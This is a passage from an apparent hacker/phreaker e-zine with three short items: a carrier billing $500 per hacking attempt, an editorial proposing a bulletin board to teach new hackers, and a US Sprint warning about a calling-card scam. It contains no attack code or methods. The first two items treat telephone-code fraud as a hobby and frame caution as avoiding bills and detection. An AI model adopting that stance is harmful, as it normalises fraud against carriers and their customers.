  2843. Communications Corp. has announced that they will be charging $500.00 PER
  2844. ATTEMPT to hack their service.  That's not PER VALID CODE, that's PER ATTEMPT.
  2845. Sources say that The Fugitive (619) received a $200,000.00 phone bill from
  2846. AllNet.
  2847.  
  2848. This may set examples for other long distance communication carriers in the
  2849. future, so be careful what you do.
  2850. ______________________________________________________________________________
  2851.  
  2852. Editorial - What Is The Best Way To Educate New Hackers?
  2853. ========================================================
  2854.  
  2855. Since the "demise" of Phreak Klass 2600 and PLP, the H/P world has not seen a
  2856. board dedicated to the education of new hackers.  Although PK2600 is still up
  2857. (806/799-0016, educate) many of the old "teachers" never call.  The board has
  2858. fallen mainly to new hackers who are looking for teachers.  This may pose a
  2859. problem.  If boards aren't the way to educate these people (I think they are
  2860. the best way, in fact), then what is?  Certainly not giant Alliance
  2861. conferences as in the past, due to recent "black-listing" of many "conferees"
  2862. who participated heavily in Alliance Teleconferencing in the past.
  2863.  
  2864. I think it might be successful if someone was able to set up another board
  2865. dedicated to teaching new hackers.  A board which is not private, but does
  2866. voice validate the users as they login.  Please leave some feedback as to what
  2867. you think of this idea, or if you are willing to set this type of system up.
  2868. Thanks.
  2869. ______________________________________________________________________________
  2870.  
  2871. US Sprint Employee Scam
  2872. =======================
  2873.  
  2874. The US Sprint Security Department is currently warning employees of a scam
  2875. which could be affecting them.  An unidentified man has been calling various
  2876. employees throughout the US Sprint system and telling them that if they give
  2877. him their FON Card numbers, they will receive an additional US Sprint employee
  2878. long-distance credit.  The Security Department says, "this is a 100 percent
  2879. scam."  "If you're called to take part in this operation, please call the
  2880. Security Department at (816)822-6217."
  2881.  
  2882.                       Information Provided By US Sprint
  2883. ______________________________________________________________________________
  2884.  
  2885.